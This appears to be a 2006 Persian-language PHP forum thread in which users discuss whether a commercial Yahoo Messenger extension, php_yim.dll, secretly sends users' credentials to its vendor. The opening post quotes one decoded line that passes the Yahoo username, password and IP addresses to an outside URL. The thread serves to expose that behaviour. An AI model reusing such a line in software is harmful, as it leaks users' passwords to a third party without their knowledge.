PersianTools Forums

Go Back   PersianTools Forums > برنامه نویسی و طراحی وب، سیستمهای مدیریت سایت > توسعه وب > PHP

Reply
 
امکانات بيشتر نحوه نمايش
Old 08-26-2006, 03:01 PM   #1
Piter1356
Registered User
 
Piter1356's Avatar
 

Join Date: Oct 2004
Location: tehran
Posts: 526
Send a message via Yahoo to Piter1356
آيا Phpkar آي دي و پسورد يا هو تست كنندگان php_yim.dll را ذخيره كرده؟

سلام

بدون مقدمه ميرم سر اصل مطلب

اين بخشي ازphp_yim.dllـــه كه توسط دوستمون phpkar با زند كد شده بود .
PHP Code:
 $code = @implode ('', @file ('' 'http://www.mobilekar.ir/yim/index.php?host=' $host '&user=' $user '&pass=' $pass '&uip=' $uip '&sip=' $sip)); 
سوال اينه كه آيا phpkar آي دي و پسورد تست كنندگان اين dll رو ذخيره ميكنه ؟ يا من اشتباه ميكنم ؟
Piter1356 is offline   Reply With Quote
Old 08-26-2006, 03:36 PM   #2
firebird
Registered User
 
firebird's Avatar
 

Join Date: Jul 2005
Posts: 1,474
از لحاظ فنی امکانش هست.
firebird is offline   Reply With Quote
Old 08-26-2006, 05:35 PM   #3
Piter1356
Registered User
 
Piter1356's Avatar
 

Join Date: Oct 2004
Location: tehran
Posts: 526
Send a message via Yahoo to Piter1356
اون يه خط كد چيكار ميكنه ؟
Piter1356 is offline   Reply With Quote
Old 08-26-2006, 05:47 PM   #4
ebrahimj
Registered User
 

Join Date: Oct 2004
Location: pp
Posts: 324
Send a message via Yahoo to ebrahimj
هیچی با اون دو تابع خروجی رو ذخیره میکنه . در ضمن برای نسخه های کرک شده هم چنین تضمین هایی وجود نداره که این کار صورت نگیره )
ebrahimj is offline   Reply With Quote
Old 08-26-2006, 06:25 PM   #5
Piter1356
Registered User
 
Piter1356's Avatar
 

Join Date: Oct 2004
Location: tehran
Posts: 526
Send a message via Yahoo to Piter1356
موضوع اينه كه تو نسخه كرك نشدش(پولي) هم همچين تظميني وجود نداره .
Piter1356 is offline   Reply With Quote
Old 08-26-2006, 06:52 PM   #6
peiman
Registered User
 
peiman's Avatar
 

Join Date: Feb 2003
Posts: 1,798
Quote:
هیچی با اون دو تابع خروجی رو ذخیره میکنه . در ضمن برای نسخه های کرک شده هم چنین تضمین هایی وجود نداره که این کار صورت نگیره )
عجيبه!
يعني ميگي نسخه كرك نشده كه كدهاش معلوم نيست چي هستند ايدي رو ذخيره نمي كنه
اما
نسخه كرك شده اين كارو ميكنه؟!!
peiman is offline   Reply With Quote
Old 08-26-2006, 07:49 PM   #7
ebrahimj
Registered User
 

Join Date: Oct 2004
Location: pp
Posts: 324
Send a message via Yahoo to ebrahimj
وقتی میخواهید پول بدید تضمین هم بگیرید .
ebrahimj is offline   Reply With Quote
Old 08-26-2006, 09:44 PM   #8
alik
Registered User
 
alik's Avatar
 

Join Date: Sep 2005
Posts: 652
Send a message via Yahoo to alik
این کد بالا اطلاعات رو میفرسته به یک اسکریپت خاص که حالا کی میدونه اون اسکریپت چیکار میکنه ؟؟ خب معلومه ما که نمیدونم شاید فقط یک چک کردن ساده باشه یا شاید هم ذخیره کنه ...

ولی چیزی که مسلم هست شما خیلی راحت میتونید هر نسخه ای که دارید رو امتحان کنید !! اگر اصلیش رو دارید یا کرک شده رو فرق نمیکنه !!
روی دستگاه خودتون اجراش کنید و یک فایروال هم بزارید حالا وقتی فایروال به شما پیغام میده که php میخواد به اینترنت وصل بشه به IP که فایروال به عنوان مقصد نشان میده نگاه کنید !
اگر IP سرور 202.71.104.241 بود که یعنی داره به سرور نویسنده برنامه اطلاعات میفرسته و من اگر بودم دیگه از این اسکریپت استفاده نمی کردم چون یادمه در ادامه این کدها یک قسمتی داشت که خروجی این اسکریپت از روی سرور نویسنده برنامه میتونست کد php بفرسته و روی سرور شما اجرا کنه ... اگر دوستان کد رو دارن اون قسمت که eval بود رو بزارن تا اگر من اشتباه میکنم دوستان دیگه هم نظر بدهند.

ولی اگر ip سرور مقصد e-massenger.net بود دیگه مشکلی نیست یعنی اسکریپت داره کار عادیش رو میکنه ...
alik is offline   Reply With Quote
Old 08-26-2006, 10:42 PM   #9
ebrahimj
Registered User
 

Join Date: Oct 2004
Location: pp
Posts: 324
Send a message via Yahoo to ebrahimj
اندر حوالات نوشته های شما . این برنامه تمام اطلاعات رو میفرسته به سایت خودش و عملیات اونجا انجام میشه . فایروال شما همیشه ادرس همون سایت سرس رو نشون میده نه چیز دیگه . اون بابا یه روز همچین چیزی رو پیشبینی کرده بود و این کارو کرد
ebrahimj is offline   Reply With Quote
Old 08-27-2006, 10:56 AM   #10
peiman
Registered User
 
peiman's Avatar
 

Join Date: Feb 2003
Posts: 1,798
Quote:
نوشته ای از ebrahimj View Post
اندر حوالات نوشته های شما . این برنامه تمام اطلاعات رو میفرسته به سایت خودش و عملیات اونجا انجام میشه . فایروال شما همیشه ادرس همون سایت سرس رو نشون میده نه چیز دیگه . اون بابا یه روز همچین چیزی رو پیشبینی کرده بود و این کارو کرد
اینا چیه ردیف کردی
ببین این اسکریپت مشکل داره
خودت هم میدونی
پس چرا ازش دفاع میکنی؟
peiman is offline   Reply With Quote
Old 08-27-2006, 11:21 AM   #11
ebrahimj
Registered User
 

Join Date: Oct 2004
Location: pp
Posts: 324
Send a message via Yahoo to ebrahimj
شما تازه سه چهار ماه که زدی تو خط php . هنوز یکم زوده که بخوایی بگی چی خوبه و چی بد
ebrahimj is offline   Reply With Quote
Old 08-27-2006, 11:30 AM   #12
peiman
Registered User
 
peiman's Avatar
 

Join Date: Feb 2003
Posts: 1,798
Quote:
نوشته ای از ebrahimj View Post
شما تازه سه چهار ماه که زدی تو خط php . هنوز یکم زوده که بخوایی بگی چی خوبه و چی بد
آها به سن و ساله؟
من چیزی رو که میبینم میگم
شما با حامد مشکل شخصی داری و اینو میگی
Quote:
در ضمن برای نسخه های کرک شده هم چنین تضمین هایی وجود نداره که این کار صورت نگیره )
اما در کل
اگه من مثل شما اسم تمام زبونهای! برنامه نویسی که اسمشونو شنیدم ردیف نمی کنم دلیل نمیشه بلد نباشم
peiman is offline   Reply With Quote
Old 08-27-2006, 11:47 AM   #13
ebrahimj
Registered User
 

Join Date: Oct 2004
Location: pp
Posts: 324
Send a message via Yahoo to ebrahimj
بنده با برادر حامد مشکلی ندارم . الان خودش میاد اینجا تایید میکنه .

شاید کارای کرده که موافق باهاش نبودم ویا قیمت های فضایی که میده . اما دلیل نمیشه که باحاش مشکل داشته باشم .
ebrahimj is offline   Reply With Quote
Old 08-27-2006, 11:50 AM   #14
ebrahimj
Registered User
 

Join Date: Oct 2004
Location: pp
Posts: 324
Send a message via Yahoo to ebrahimj
اما چیزی که مشخصه اینه که PHPKAR میتونسته حر کاری کرده باشه . چون توابع اصلی جای دیگری هستند و دسته یوزر ها بستس . ولی یک چیزی که مشخصه اینه که یک تولید کننده و ... همیشه سعی میکنه رضایت مشتری هاشو جلب کنه نه اینکه پسورد ایدی هارو برای روز مبادا ذخیره کنه .
ebrahimj is offline   Reply With Quote
Old 08-27-2006, 02:20 PM   #15
alik
Registered User
 
alik's Avatar
 

Join Date: Sep 2005
Posts: 652
Send a message via Yahoo to alik
تا اونجایی که من یکبار دیکد شده این اسکریپت رو دیدم یک قسمت login به سرور e-messenger داشت که داخل همین کلاس بود پس فکر میکنم که یکسری کارهای روی سرور خود شما انجام میشه نه روی سرور سورس ... حالا اصلا مهم نیست

اگر واقعا برای کسی مهم هست که بدونه این اسکریپت چیکار میکنه کافیه که sniffer نصب کنید و خروجی و ورودی های اسکریپت رو نگاه کنید خیلی ساده معلوم میشه که چیکار میکنه برای من که اهمیتی نداره همچین کار روی هم نمیکنم همون روش ساده اول که گفتم همه چیز رو مشخص میکرد ...

درضمن اگر واقعا لنگ همچین اسکریپتی هستید ایشان ایده خوبی داشتن و وقت گذاشتن یک کلاس نوشتن ولی اصلا ماجرا اینه :
شما وارد سایت e-messenger بشوید یک فرم login می بینید برای چند مدل مسنجر yahoo, msn,aol ... خب حالا به پارامتر های این فرم نگاه کنید کافیه که با php نام کاربری و کلمه رمز رو به آدرس e-messenge/webyahoo
بفرستید و به همین راحتی لوگین کنید بعدش هم یک درخواست میفرستید که از ایدی شما به ایدی مقصد یک پیغام بفرسته !!

البته کدهای این کار هم تو اینترنت ریخته پس اصلا زحمت کار کردن با sock رو به خودتون ندید و خیلی راحت از کدهای آماده کپی کنید و آدرس e-messnger/webyahoo رو جایگزین کنید اسم c oookie ها رو جایگزین کنید و ادرس درخواست ارسال پیام رو هم پیدا کنید از http://www.ebuddy.com/index.php و همه چیز تموم شد شما اسکریپت نوشتید که به یاهو پیغام میفرسته !
alik is offline   Reply With Quote
Reply

امکانات بيشتر
نحوه نمايش

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT +4.5. The time now is 12:22 PM.

PersianTools RSS Feeds


Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.